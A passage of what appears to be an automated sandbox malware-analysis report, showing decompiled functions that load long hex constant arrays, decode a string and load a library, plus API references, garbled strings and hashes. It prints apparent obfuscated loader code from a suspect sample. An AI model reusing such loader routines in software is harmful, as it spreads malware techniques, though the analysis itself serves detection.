				 *((intOrPtr*)(_t463 - 0x24c)) = 0xc81c23b9;
				 *((intOrPtr*)(_t463 - 0x248)) = 0x8b4f3ac9;
				 *((intOrPtr*)(_t463 - 0x244)) = 0xe8e448f9;
				 *((intOrPtr*)(_t463 - 0x240)) = 0x71ab7e57;
				 *((intOrPtr*)(_t463 - 0x23c)) = 0x365e1ce1;
				 *((intOrPtr*)(_t463 - 0x238)) = 0xec4ce2b5;
				 *((intOrPtr*)(_t463 - 0x234)) = 0xb1697b33;
				 *((intOrPtr*)(_t463 - 0x230)) = 0xd54212f6;
				 *((intOrPtr*)(_t463 - 0x22c)) = 0xb3b8e6f2;
				 *((intOrPtr*)(_t463 - 0x228)) = 0x8dcb06ce;
				 *((intOrPtr*)(_t463 - 0x224)) = 0x2fca0a18;
				 *((intOrPtr*)(_t463 - 0x220)) = 0x4c1ce5f;
				 *((intOrPtr*)(_t463 - 0x21c)) = 0xbde3659e;
				 *((intOrPtr*)(_t463 - 0x218)) = 0x36eced2;
				 *((intOrPtr*)(_t463 - 0x214)) = 0x4ddfb142;
				 *((intOrPtr*)(_t463 - 0x210)) = 0xd6115c70;
				 *((intOrPtr*)(_t463 - 0x20c)) = 0x9da12f2a;
				 *((intOrPtr*)(_t463 - 0x208)) = 0xdadc95be;
				 *((intOrPtr*)(_t463 - 0x204)) = 0x3574398b;
				 *((intOrPtr*)(_t463 - 0x200)) = 0xc1e64aa9;
				 *((intOrPtr*)(_t463 - 0x1fc)) = 0x2f067620;
				 *((intOrPtr*)(_t463 - 0x1f8)) = 0x127d19ca;
				 *((intOrPtr*)(_t463 - 0x1f4)) = 0x31849cb6;
				 *((intOrPtr*)(_t463 - 0x1f0)) = 0xa2873b49;
				 *((intOrPtr*)(_t463 - 0x1ec)) = 0x7af4f8cb;
				 *((intOrPtr*)(_t463 - 0x1e8)) = 0xc99a140b;
				 *((intOrPtr*)(_t463 - 0x1e4)) = 0xd08da1c3;
				 *((intOrPtr*)(_t463 - 0x1e0)) = 0x6bd4d31d;
				 *((intOrPtr*)(_t463 - 0x1dc)) = 0x9c783407;
				 *((intOrPtr*)(_t463 - 0x1d8)) = 0x3b5c6e41;
				 *((intOrPtr*)(_t463 - 0x1d4)) = 0x4745905a;
				 *((intOrPtr*)(_t463 - 0x1d0)) = 0x360d7956;
				 *((intOrPtr*)(_t463 - 0x1cc)) = 0x31e7a990;
				 *((intOrPtr*)(_t463 - 0x1c8)) = 0x22ca18bd;
				 *((intOrPtr*)(_t463 - 0x1c4)) = 0x81a7a290;
				 *((intOrPtr*)(_t463 - 0x1c0)) = 0x52ca4368;
				 *((intOrPtr*)(_t463 - 0x1bc)) = 0x6b0288f2;
				 *((intOrPtr*)(_t463 - 0x1b8)) = 0x6469c6be;
				 *((intOrPtr*)(_t463 - 0x1b4)) = 0xc8699152;
				 *((intOrPtr*)(_t463 - 0x1b0)) = 0x4ccc5a87;
				 *((intOrPtr*)(_t463 - 0x1ac)) = 0xf4b0c619;
				 *((intOrPtr*)(_t463 - 0x1a8)) = 0x36419956;
				 *((intOrPtr*)(_t463 - 0x1a4)) = 0x48c65e2c;
				 *((intOrPtr*)(_t463 - 0x1a0)) = 0x8a727e35;
				 *((intOrPtr*)(_t463 - 0x19c)) = 0x1ec4972;
				 *((intOrPtr*)(_t463 - 0x198)) = 0xa05eb2f8;
				 *((intOrPtr*)(_t463 - 0x194)) = 0x66788d5a;
				 *((intOrPtr*)(_t463 - 0x190)) = 0x56f7265e;
				 *((intOrPtr*)(_t463 - 0x18c)) = 0xda28f248;
				 *((intOrPtr*)(_t463 - 0x188)) = 0xaac23347;
				 *((intOrPtr*)(_t463 - 0x184)) = 0xd1dedcd1;
				 *((intOrPtr*)(_t463 - 0x180)) = 0x4dc26aad;
				 *((intOrPtr*)(_t463 - 0x17c)) = 0x57641d9e;
				 *((intOrPtr*)(_t463 - 0x178)) = 0x2443dfcd;
				 *((intOrPtr*)(_t463 - 0x174)) = 0xb8c01852;
				 *((intOrPtr*)(_t463 - 0x170)) = 0x1c7941fd;
				 *((intOrPtr*)(_t463 - 0x16c)) = 0xcb796a74;
				 *((intOrPtr*)(_t463 - 0x168)) = 0xc28e2e87;
				 *((intOrPtr*)(_t463 - 0x164)) = 0xa45bfb0a;
				 *((intOrPtr*)(_t463 - 0x160)) = 0x7bc0412;
				 *((intOrPtr*)(_t463 - 0x15c)) = 0xd90e0108;
				 *((intOrPtr*)(_t463 - 0x158)) = 0x169acac2;
				 *((intOrPtr*)(_t463 - 0x154)) = 0x300e0d77;
				 *((intOrPtr*)(_t463 - 0x150)) = 0x8e0481c8;
				 *((intOrPtr*)(_t463 - 0x14c)) = 0x5e209984;
				 *((intOrPtr*)(_t463 - 0x148)) = 0xbe02a08b;
				 *((intOrPtr*)(_t463 - 0x144)) = 0xa7a66393;
				 *((intOrPtr*)(_t463 - 0x140)) = 0x8a22029d;
				 *((intOrPtr*)(_t463 - 0x13c)) = 0xbfc8486d;
				 *((intOrPtr*)(_t463 - 0x138)) = 0x781a2d70;
				 *((intOrPtr*)(_t463 - 0x134)) = 0x80b21b5e;
				 *((intOrPtr*)(_t463 - 0x130)) = 0x7441948;
				 *((intOrPtr*)(_t463 - 0x12c)) = 0xd41f7b57;
				 *((intOrPtr*)(_t463 - 0x128)) = 0xe04edfcb;
				 *((intOrPtr*)(_t463 - 0x124)) = 0x87848915;
				 *((intOrPtr*)(_t463 - 0x120)) = 0xa3fe93d0;
				 *((intOrPtr*)(_t463 - 0x11c)) = 0x7b43b7c7;
				 *((intOrPtr*)(_t463 - 0x118)) = 0x71eb1ebe;
				 *((intOrPtr*)(_t463 - 0x114)) = 0x3fc3cf06;
				 *((intOrPtr*)(_t463 - 0x110)) = 0xe099602f;
				 *((intOrPtr*)(_t463 - 0x10c)) = 0xef6eace7;
				 *((intOrPtr*)(_t463 - 0x108)) = 0xfe2f55a3;
				 *((intOrPtr*)(_t463 - 0x104)) = 0x50297237;
				 *((intOrPtr*)(_t463 - 0x100)) = 0x7ab2c6b1;
				 *((intOrPtr*)(_t463 - 0xfc)) = 0xd7712ace;
				 *((intOrPtr*)(_t463 - 0xf8)) = 0x4dfcead3;
				 *((intOrPtr*)(_t463 - 0xf4)) = 0x89bd62f5;
				 *((intOrPtr*)(_t463 - 0xf0)) = 0x43947872;
				 *((intOrPtr*)(_t463 - 0xec)) = 0xafd5e012;
				 *((intOrPtr*)(_t463 - 0xe8)) = 0xcdbfaa54;
				 *((intOrPtr*)(_t463 - 0xe4)) = 0xddbbdc60;
				 *((intOrPtr*)(_t463 - 0xe0)) = 0x7d5aea78;
				 *((intOrPtr*)(_t463 - 0xdc)) = 0xec9116d3;
				 *((intOrPtr*)(_t463 - 0xd8)) = 0xd2ec0453;
				 *((intOrPtr*)(_t463 - 0xd4)) = 0x62656cfd;
				 *((intOrPtr*)(_t463 - 0xd0)) = 0x746b28c7;
				 *((intOrPtr*)(_t463 - 0xcc)) = 0x3d2f2bfd;
				 *((intOrPtr*)(_t463 - 0xc8)) = 0x10f71dd2;
				 *((intOrPtr*)(_t463 - 0xc4)) = 0x7761a633;
				 *((intOrPtr*)(_t463 - 0xc0)) = 0x112310e8;
				 *((intOrPtr*)(_t463 - 0xbc)) = 0x9abef716;
				 *((intOrPtr*)(_t463 - 0xb8)) = 0x210efd2e;
				 *((intOrPtr*)(_t463 - 0xb4)) = 0x54b4385a;
				 *((intOrPtr*)(_t463 - 0xb0)) = 0xc547a5c1;
				 *((intOrPtr*)(_t463 - 0xac)) = 0x8a213ab;
				 *((intOrPtr*)(_t463 - 0xa8)) = 0x260c246d;
				 *((intOrPtr*)(_t463 - 0xa4)) = 0x203e3bea;
				 *((intOrPtr*)(_t463 - 0xa0)) = 0xfa5f14d3;
				 *((intOrPtr*)(_t463 - 0x9c)) = 0xf559ef4b;
				 *((intOrPtr*)(_t463 - 0x98)) = 0x444e4cb4;
				 *((intOrPtr*)(_t463 - 0x94)) = 0x274ccac7;
				 *((intOrPtr*)(_t463 - 0x90)) = 0x11036e68;
				 *((intOrPtr*)(_t463 - 0x8c)) = 0xe0b0320a;
				 *((intOrPtr*)(_t463 - 0x88)) = 0xf6e7f312;
				 *((intOrPtr*)(_t463 - 0x84)) = 0xb116a956;
				 *((intOrPtr*)(_t463 - 0x80)) = 0xd583cb23;
				 *((intOrPtr*)(_t463 - 0x7c)) = 0xf9453082;
				 *((intOrPtr*)(_t463 - 0x78)) = 0xb3e4f498;
				 *((intOrPtr*)(_t463 - 0x74)) = 0x985422;
				 *((intOrPtr*)(_t463 - 0x70)) = 0x1af45694;
				 *((intOrPtr*)(_t463 - 0x6c)) = 0x56bee25f;
				 *((intOrPtr*)(_t463 - 0x68)) = 0x17e0422f;
				 *((intOrPtr*)(_t463 - 0x64)) = 0xae1efe3d;
				 *((intOrPtr*)(_t463 - 0x60)) = 0x4e0fee18;
				 *((intOrPtr*)(_t463 - 0x5c)) = 0x8fb0c196;
				 *((intOrPtr*)(_t463 - 0x58)) = 0x8c574b2b;
				 *((intOrPtr*)(_t463 - 0x54)) = 0xee1ba36b;
				 *((intOrPtr*)(_t463 - 0x50)) = 0xb4450d93;
				 *((intOrPtr*)(_t463 - 0x4c)) = 0x4b9bdf79;
				 *((intOrPtr*)(_t463 - 0x48)) = 0x20e2b4c6;
				 *((intOrPtr*)(_t463 - 0x44)) = 0xa6fe7617;
				 *((intOrPtr*)(_t463 - 0x40)) = 0xce77743f;
				 *((intOrPtr*)(_t463 - 0x3c)) = 0xed2f08ba;
				 *((intOrPtr*)(_t463 - 0x38)) = 0xb7a020b5;
				 *((intOrPtr*)(_t463 - 0x34)) = 0x5049adfa;
				 *((intOrPtr*)(_t463 - 0x30)) = 0x4653483e;
				 *((intOrPtr*)(_t463 - 0x2c)) = 0xf88fc154;
				 *((intOrPtr*)(_t463 - 0x28)) = 0x2170b424;
				 *((intOrPtr*)(_t463 - 0x24)) = 0x97127f63;
				 *((intOrPtr*)(_t463 - 0x20)) = 0x2c72e78b;
				 *((intOrPtr*)(_t463 - 0x1c)) = 0xa4a4af2b;
				 *((intOrPtr*)(_t463 - 0x18)) = 0xa22f88e1;
				 *((intOrPtr*)(_t463 - 0x14)) = 0x26e727d2;
				 *((intOrPtr*)(_t463 - 0x10)) = 0xba3bd70d;
				 *((intOrPtr*)(_t463 - 0xc)) = 0x532c4572;
				 *((intOrPtr*)(_t463 - 8)) = 0x72bb8f8c;
				 *((intOrPtr*)(_t463 - 4)) = 0x92993252;
				_t461 = L00111D00(0x122650, 0x110, _t459);
				 *0x127c78 = LoadLibraryW(_t461);
				_t452 = HeapFree(GetProcessHeap(), 0, _t461);
				_t456 =  *0x127c78; // 0x764b0000
				_t462 = 0x1f5c6a;
				if(_t456 != 0) {
					goto 0x3116c5;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t454, _t456, _t463 - 0x6fc, _t459, _t462);
				} else {
					goto 0x3116b2;
					return _t452;
				}
			}

0x0011717a
0x00117184
0x0011718e
0x00117198
0x001171a2
0x001171ac
0x001171b6
0x001171c0
0x001171ca
0x001171d4
0x001171de
0x001171e8
0x001171f2
0x001171fc
0x00117206
0x00117210
0x0011721a
0x00117224
0x0011722e
0x00117238
0x00117242
0x0011724c
0x00117256
0x00117260
0x0011726a
0x00117274
0x0011727e
0x00117288
0x00117292
0x0011729c
0x001172a6
0x001172b0
0x001172ba
0x001172c4
0x001172ce
0x001172d8
0x001172e2
0x001172ec
0x001172f6
0x00117300
0x0011730a
0x00117314
0x0011731e
0x00117328
0x00117332
0x0011733c
0x00117346
0x00117350
0x0011735a
0x00117364
0x0011736e
0x00117378
0x00117382
0x0011738c
0x00117396
0x001173a0
0x001173aa
0x001173b4
0x001173be
0x001173c8
0x001173d2
0x001173dc
0x001173e6
0x001173f0
0x001173fa
0x00117404
0x0011740e
0x00117418
0x00117422
0x0011742c
0x00117436
0x00117440
0x0011744a
0x00117454
0x0011745e
0x00117468
0x00117472
0x0011747c
0x00117486
0x00117490
0x0011749a
0x001174a4
0x001174ae
0x001174b8
0x001174c2
0x001174cc
0x001174d6
0x001174e0
0x001174ea
0x001174f4
0x001174fe
0x00117508
0x00117512
0x0011751c
0x00117526
0x00117530
0x0011753a
0x00117544
0x0011754e
0x00117558
0x00117562
0x0011756c
0x00117576
0x00117580
0x0011758a
0x00117594
0x0011759e
0x001175a8
0x001175b2
0x001175bc
0x001175c6
0x001175d0
0x001175da
0x001175e4
0x001175ee
0x001175f8
0x00117602
0x0011760c
0x00117616
0x00117620
0x0011762a
0x00117634
0x0011763e
0x00117648
0x00117652
0x0011765c
0x00117666
0x00117670
0x0011767a
0x00117684
0x0011768e
0x00117698
0x001176a2
0x001176ac
0x001176b6
0x001176c0
0x001176ca
0x001176d4
0x001176de
0x001176e8
0x001176f2
0x001176fc
0x00117706
0x00117710
0x0011771a
0x00117724
0x0011772e
0x00117738
0x00117742
0x0011774c
0x00117756
0x00117760
0x0011776a
0x00117774
0x0011777e
0x00117788
0x00117792
0x0011779c
0x001177a6
0x001177b0
0x001177ba
0x001177c4
0x001177ce
0x001177d8
0x001177e2
0x001177ec
0x001177f6
0x00117800
0x0011780a
0x00117814
0x0011781e
0x00117828
0x00117832
0x0011783c
0x00117846
0x00117850
0x0011785a
0x00117864
0x0011786e
0x00117878
0x00117882
0x0011788c
0x00117896
0x001178a0
0x001178aa
0x001178b4
0x001178be
0x001178c8
0x001178d2
0x001178dc
0x001178e6
0x001178f0
0x001178fa
0x00117904
0x0011790e
0x00117918
0x00117922
0x0011792c
0x00117936
0x00117940
0x0011794a
0x00117954
0x0011795e
0x00117968
0x00117972
0x0011797c
0x00117986
0x00117990
0x0011799a
0x001179a4
0x001179ae
0x001179b8
0x001179c2
0x001179cc
0x001179d6
0x001179e0
0x001179ea
0x001179f4
0x001179fe
0x00117a08
0x00117a12
0x00117a1c
0x00117a26
0x00117a30
0x00117a3a
0x00117a44
0x00117a4e
0x00117a58
0x00117a62
0x00117a6c
0x00117a76
0x00117a80
0x00117a8a
0x00117a94
0x00117a9e
0x00117aa8
0x00117ab2
0x00117abc
0x00117ac6
0x00117ad0
0x00117ada
0x00117ae4
0x00117aee
0x00117af8
0x00117b02
0x00117b0c
0x00117b16
0x00117b20
0x00117b2a
0x00117b34
0x00117b3e
0x00117b48
0x00117b52
0x00117b5c
0x00117b66
0x00117b70
0x00117b7a
0x00117b84
0x00117b8e
0x00117b98
0x00117ba2
0x00117bac
0x00117bb6
0x00117bc0
0x00117bca
0x00117bd4
0x00117bde
0x00117be8
0x00117bf2
0x00117bfc
0x00117c06
0x00117c10
0x00117c1a
0x00117c24
0x00117c2e
0x00117c38
0x00117c42
0x00117c4c
0x00117c56
0x00117c60
0x00117c6a
0x00117c74
0x00117c7e
0x00117c88
0x00117c92
0x00117c9c
0x00117ca6
0x00117cb0
0x00117cba
0x00117cc4
0x00117cce
0x00117cd8
0x00117ce2
0x00117cec
0x00117cf6
0x00117d00
0x00117d0a
0x00117d14
0x00117d1e
0x00117d28
0x00117d32
0x00117d3c
0x00117d46
0x00117d50
0x00117d5a
0x00117d64
0x00117d6e
0x00117d78
0x00117d82
0x00117d8c
0x00117d96
0x00117da0
0x00117daa
0x00117db4
0x00117dbe
0x00117dc8
0x00117dd2
0x00117ddc
0x00117de6
0x00117df0
0x00117dfa
0x00117e04
0x00117e0e
0x00117e18
0x00117e22
0x00117e2c
0x00117e36
0x00117e40
0x00117e4a
0x00117e54
0x00117e5e
0x00117e68
0x00117e72
0x00117e7c
0x00117e86
0x00117e90
0x00117e9a
0x00117ea4
0x00117eae
0x00117eb8
0x00117ec2
0x00117ecc
0x00117ed6
0x00117ee0
0x00117eea
0x00117ef4
0x00117efe
0x00117f08
0x00117f12
0x00117f1c
0x00117f26
0x00117f30
0x00117f3a
0x00117f44
0x00117f4e
0x00117f58
0x00117f62
0x00117f6c
0x00117f76
0x00117f80
0x00117f8a
0x00117f94
0x00117f9e
0x00117fa8
0x00117fb2
0x00117fbc
0x00117fc6
0x00117fd0
0x00117fda
0x00117fe4
0x00117fee
0x00117ff8
0x00118002
0x0011800c
0x00118016
0x00118020
0x0011802a
0x00118034
0x0011803e
0x00118048
0x00118052
0x0011805c
0x00118066
0x00118070
0x0011807a
0x00118084
0x0011808e
0x00118098
0x001180a2
0x001180ac
0x001180b6
0x001180c0
0x001180ca
0x001180d4
0x001180de
0x001180e8
0x001180f2
0x001180fc
0x00118106
0x00118110
0x0011811a
0x00118124
0x0011812e
0x00118138
0x0011814c
0x0011815b
0x00118165
0x0011816f
0x00118179
0x00118183
0x0011818d
0x00118197
0x001181a1
0x001181ab
0x001181b5
0x001181bf
0x001181c6
0x001181cd
0x001181d4
0x001181db
0x001181e2
0x001181e9
0x001181f0
0x001181f7
0x001181fe
0x00118205
0x0011820c
0x00118213
0x0011821a
0x00118221
0x00118228
0x0011822f
0x00118236
0x0011823d
0x00118244
0x0011824b
0x00118252
0x00118259
0x00118260
0x00118267
0x0011826e
0x00118275
0x0011827c
0x00118283
0x0011828a
0x00118291
0x00118298
0x001182a7
0x001182b3
0x001182bf
0x001182c5
0x001182cb
0x001182ce
0x001182d6
0x001182db
0x001182dc
0x001182dd
0x001182de
0x001182df
0x001182e0
0x001182e1
0x001182e2
0x001182e3
0x001182e4
0x001182f6
0x001182d0
0x001182d0
0x001182d5
0x001182d5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 001182AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001182B8
HeapFree.KERNEL32(00000000), ref: 001182BF

Strings

xZ}, xrefs: 001180C0
fsI, xrefs: 00117620
ZGK~, xrefs: 0011794A
7r)P, xrefs: 00118066
P+"V, xrefs: 0011747C
rE,S, xrefs: 0011828A
,W<B, xrefs: 001179FE
, ?|, xrefs: 00117594
Vy6, xrefs: 00117E68
*U I, xrefs: 00117B20
V@%, xrefs: 001179EA
An\;, xrefs: 00117E54
_5S, xrefs: 00117378
;> , xrefs: 00118165
Mr-J, xrefs: 00117184
Xe:, xrefs: 00117A44
>HSF, xrefs: 0011824B
]vFu, xrefs: 001175E4
S#w7, xrefs: 00117210

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: Xe:$*U I$, ?|$,W<B$7r)P$>HSF$An\;$Mr-J$P+"V$S#w7$Vy6$ZGK~$]vFu$_5S$fsI$rE,S$xZ}$;> $V@%
API String ID: 872250060-430349358
Opcode ID: 3cb70b02f02d09854571b561434b5773a31595cafb67b54f63666430657ec905
Instruction ID: 944cb6b280a82454dd6c1d102523035cab7f37f0eb18175262530e37d7c59d0f
Opcode Fuzzy Hash: 3cb70b02f02d09854571b561434b5773a31595cafb67b54f63666430657ec905
Instruction Fuzzy Hash: B28294F48467698FDB618F429E8468EBA75FB52305F6086C8C25D3B214CB750BD2CF89

Uniqueness

Uniqueness Score: 100.00%

Function 001195BA, Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 362
memorylibraryUNIQUE

C-Code - Quality: 96%

			E001195BA(void* __esi, void* __eflags) {
				int _t347;
				void* _t349;
				intOrPtr _t351;
				void* _t354;
				void* _t356;
				void* _t357;
				void* _t358;

				 *((intOrPtr*)(_t358 - 0x558)) = 0x5983dc83;
				 *((intOrPtr*)(_t358 - 0x554)) = 0x6205147;
				 *((intOrPtr*)(_t358 - 0x550)) = 0x9c52694a;
				 *((intOrPtr*)(_t358 - 0x54c)) = 0xea11a8ca;
				 *((intOrPtr*)(_t358 - 0x548)) = 0xf4e832d5;
				 *((intOrPtr*)(_t358 - 0x544)) = 0xb42439a8;
				 *((intOrPtr*)(_t358 - 0x540)) = 0x86c85539;
				 *((intOrPtr*)(_t358 - 0x53c)) = 0xff8e5c81;
				 *((intOrPtr*)(_t358 - 0x538)) = 0x3fb35c90;
				 *((intOrPtr*)(_t358 - 0x534)) = 0x57b16f81;
				 *((intOrPtr*)(_t358 - 0x530)) = 0x37ce5ecd;
				 *((intOrPtr*)(_t358 - 0x52c)) = 0xc6349551;
				 *((intOrPtr*)(_t358 - 0x528)) = 0xe3cb20bc;
				 *((intOrPtr*)(_t358 - 0x524)) = 0xf50b0380;
				 *((intOrPtr*)(_t358 - 0x520)) = 0xec73c88e;
				 *((intOrPtr*)(_t358 - 0x51c)) = 0x234399d1;
				 *((intOrPtr*)(_t358 - 0x518)) = 0x17cbc3b;
				 *((intOrPtr*)(_t358 - 0x514)) = 0x810ab82a;
				 *((intOrPtr*)(_t358 - 0x510)) = 0x5c585a3e;
				 *((intOrPtr*)(_t358 - 0x50c)) = 0x95eb5a86;
				 *((intOrPtr*)(_t358 - 0x508)) = 0xbcf8e1f;
				 *((intOrPtr*)(_t358 - 0x504)) = 0x40edeb7e;
				 *((intOrPtr*)(_t358 - 0x500)) = 0xea6e92a7;
				 *((intOrPtr*)(_t358 - 0x4fc)) = 0xd576636c;
				 *((intOrPtr*)(_t358 - 0x4f8)) = 0x41cee1bc;
				 *((intOrPtr*)(_t358 - 0x4f4)) = 0x37250fc;
				 *((intOrPtr*)(_t358 - 0x4f0)) = 0x4e30bf56;
				 *((intOrPtr*)(_t358 - 0x4ec)) = 0x3decacab;
				 *((intOrPtr*)(_t358 - 0x4e8)) = 0xefe66d4c;
				 *((intOrPtr*)(_t358 - 0x4e4)) = 0x94023881;
				 *((intOrPtr*)(_t358 - 0x4e0)) = 0xc560eac;
				 *((intOrPtr*)(_t358 - 0x4dc)) = 0xc528d1f9;
				 *((intOrPtr*)(_t358 - 0x4d8)) = 0x1f6e1575;
				 *((intOrPtr*)(_t358 - 0x4d4)) = 0xaec179f;
				 *((intOrPtr*)(_t358 - 0x4d0)) = 0x30985a0c;
				 *((intOrPtr*)(_t358 - 0x4cc)) = 0x48e5158f;
				 *((intOrPtr*)(_t358 - 0x4c8)) = 0xf5ad63f4;
				 *((intOrPtr*)(_t358 - 0x4c4)) = 0x1ad9829c;
				 *((intOrPtr*)(_t358 - 0x4c0)) = 0x97309805;
				 *((intOrPtr*)(_t358 - 0x4bc)) = 0xd12beb8;
				 *((intOrPtr*)(_t358 - 0x4b8)) = 0xc0b96d24;
				 *((intOrPtr*)(_t358 - 0x4b4)) = 0x1d320e17;
				 *((intOrPtr*)(_t358 - 0x4b0)) = 0x41be0792;
				 *((intOrPtr*)(_t358 - 0x4ac)) = 0x7047ade7;
				 *((intOrPtr*)(_t358 - 0x4a8)) = 0x1759681;
				 *((intOrPtr*)(_t358 - 0x4a4)) = 0xef64f19b;
				 *((intOrPtr*)(_t358 - 0x4a0)) = 0xf69756ef;
				 *((intOrPtr*)(_t358 - 0x49c)) = 0x848cfa8b;
				 *((intOrPtr*)(_t358 - 0x498)) = 0xe24a2799;
				 *((intOrPtr*)(_t358 - 0x494)) = 0x21bab94d;
				 *((intOrPtr*)(_t358 - 0x490)) = 0xf9cffe40;
				 *((intOrPtr*)(_t358 - 0x48c)) = 0x121baed7;
				 *((intOrPtr*)(_t358 - 0x488)) = 0xecdca60c;
				 *((intOrPtr*)(_t358 - 0x484)) = 0x9ade6e2c;
				 *((intOrPtr*)(_t358 - 0x480)) = 0x8d0df929;
				 *((intOrPtr*)(_t358 - 0x47c)) = 0xa3a42f5d;
				 *((intOrPtr*)(_t358 - 0x478)) = 0x2b6599;
				 *((intOrPtr*)(_t358 - 0x474)) = 0x8570bfb;
				 *((intOrPtr*)(_t358 - 0x470)) = 0xb1287738;
				 *((intOrPtr*)(_t358 - 0x46c)) = 0xaab6ccff;
				 *((intOrPtr*)(_t358 - 0x468)) = 0x1e5133f6;
				 *((intOrPtr*)(_t358 - 0x464)) = 0xad65e96a;
				 *((intOrPtr*)(_t358 - 0x460)) = 0xb82055dd;
				 *((intOrPtr*)(_t358 - 0x45c)) = 0x3f8794c5;
				 *((intOrPtr*)(_t358 - 0x458)) = 0x4257c01a;
				 *((intOrPtr*)(_t358 - 0x454)) = 0xd574423b;
				 *((intOrPtr*)(_t358 - 0x450)) = 0xd390a41e;
				 *((intOrPtr*)(_t358 - 0x44c)) = 0xb5b6efd7;
				 *((intOrPtr*)(_t358 - 0x448)) = 0x55f35975;
				 *((intOrPtr*)(_t358 - 0x444)) = 0x5d07ad64;
				 *((intOrPtr*)(_t358 - 0x440)) = 0x69ef2174;
				 *((intOrPtr*)(_t358 - 0x43c)) = 0xca43e0cc;
				 *((intOrPtr*)(_t358 - 0x438)) = 0x9d2d59d9;
				 *((intOrPtr*)(_t358 - 0x434)) = 0x76e645a5;
				 *((intOrPtr*)(_t358 - 0x430)) = 0xc6f3628e;
				 *((intOrPtr*)(_t358 - 0x42c)) = 0x568dc342;
				 *((intOrPtr*)(_t358 - 0x428)) = 0x28f8c939;
				 *((intOrPtr*)(_t358 - 0x424)) = 0x52b6dd6c;
				 *((intOrPtr*)(_t358 - 0x420)) = 0x9ce342d0;
				 *((intOrPtr*)(_t358 - 0x41c)) = 0x78061332;
				 *((intOrPtr*)(_t358 - 0x418)) = 0x72dffa0c;
				 *((intOrPtr*)(_t358 - 0x414)) = 0x4c7a188b;
				 *((intOrPtr*)(_t358 - 0x410)) = 0x1056a024;
				 *((intOrPtr*)(_t358 - 0x40c)) = 0x1fd121d0;
				 *((intOrPtr*)(_t358 - 0x408)) = 0x7a29a4a6;
				 *((intOrPtr*)(_t358 - 0x404)) = 0x5616e816;
				 *((intOrPtr*)(_t358 - 0x400)) = 0xc8a7c690;
				 *((intOrPtr*)(_t358 - 0x3fc)) = 0x634496e9;
				 *((intOrPtr*)(_t358 - 0x3f8)) = 0x1aeda1c1;
				 *((intOrPtr*)(_t358 - 0x3f4)) = 0xc77be79e;
				 *((intOrPtr*)(_t358 - 0x3f0)) = 0xc10d7c15;
				 *((intOrPtr*)(_t358 - 0x3ec)) = 0x678d53e;
				 *((intOrPtr*)(_t358 - 0x3e8)) = 0xe84f9b4d;
				 *((intOrPtr*)(_t358 - 0x3e4)) = 0x2d8e37df;
				 *((intOrPtr*)(_t358 - 0x3e0)) = 0x1c9f512c;
				 *((intOrPtr*)(_t358 - 0x3dc)) = 0x721fe9e4;
				 *((intOrPtr*)(_t358 - 0x3d8)) = 0x2f9e4915;
				 *((intOrPtr*)(_t358 - 0x3d4)) = 0xcb82fd6;
				 *((intOrPtr*)(_t358 - 0x3d0)) = 0x8733750f;
				 *((intOrPtr*)(_t358 - 0x3cc)) = 0x5a96da0b;
				 *((intOrPtr*)(_t358 - 0x3c8)) = 0xfb61b19;
				 *((intOrPtr*)(_t358 - 0x3c4)) = 0xf82ecf56;
				 *((intOrPtr*)(_t358 - 0x3c0)) = 0x5047e2c1;
				 *((intOrPtr*)(_t358 - 0x3bc)) = 0x83c7f9b1;
				 *((intOrPtr*)(_t358 - 0x3b8)) = 0xeb38ecc1;
				 *((intOrPtr*)(_t358 - 0x3b4)) = 0xb540920d;
				 *((intOrPtr*)(_t358 - 0x3b0)) = 0x8a59e6a5;
				 *((intOrPtr*)(_t358 - 0x3ac)) = 0x48ce5054;
				 *((intOrPtr*)(_t358 - 0x3a8)) = 0xb077f7c5;
				 *((intOrPtr*)(_t358 - 0x3a4)) = 0x44b285c2;
				 *((intOrPtr*)(_t358 - 0x3a0)) = 0xb82b7cd6;
				 *((intOrPtr*)(_t358 - 0x39c)) = 0xbac7d26e;
				 *((intOrPtr*)(_t358 - 0x398)) = 0x4fa12047;
				 *((intOrPtr*)(_t358 - 0x394)) = 0x5b1b2387;
				 *((intOrPtr*)(_t358 - 0x390)) = 0x33d23848;
				 *((intOrPtr*)(_t358 - 0x38c)) = 0xc6de4f8;
				 *((intOrPtr*)(_t358 - 0x388)) = 0x803a506;
				 *((intOrPtr*)(_t358 - 0x384)) = 0xa7b6287c;
				 *((intOrPtr*)(_t358 - 0x380)) = 0xd070df9f;
				 *((intOrPtr*)(_t358 - 0x37c)) = 0xcbc4aeb8;
				 *((intOrPtr*)(_t358 - 0x378)) = 0xe185d25e;
				 *((intOrPtr*)(_t358 - 0x374)) = 0xa908665f;
				 *((intOrPtr*)(_t358 - 0x370)) = 0x879d8154;
				 *((intOrPtr*)(_t358 - 0x36c)) = 0xf860ba1c;
				 *((intOrPtr*)(_t358 - 0x368)) = 0x800d30f6;
				 *((intOrPtr*)(_t358 - 0x364)) = 0xefe65c19;
				 *((intOrPtr*)(_t358 - 0x360)) = 0xd2639963;
				 *((intOrPtr*)(_t358 - 0x35c)) = 0x120dd8b4;
				 *((intOrPtr*)(_t358 - 0x358)) = 0xed0eef0f;
				 *((intOrPtr*)(_t358 - 0x354)) = 0x6fe63af;
				 *((intOrPtr*)(_t358 - 0x350)) = 0x9e1c0c05;
				 *((intOrPtr*)(_t358 - 0x34c)) = 0x9714819b;
				 *((intOrPtr*)(_t358 - 0x348)) = 0x2cec068d;
				 *((intOrPtr*)(_t358 - 0x344)) = 0xbbb137b5;
				 *((intOrPtr*)(_t358 - 0x340)) = 0xe4cbb375;
				 *((intOrPtr*)(_t358 - 0x33c)) = 0xbfb34f78;
				 *((intOrPtr*)(_t358 - 0x338)) = 0x4e068179;
				 *((intOrPtr*)(_t358 - 0x334)) = 0xc0113683;
				 *((intOrPtr*)(_t358 - 0x330)) = 0xf9737f0c;
				 *((intOrPtr*)(_t358 - 0x32c)) = 0x55479d02;
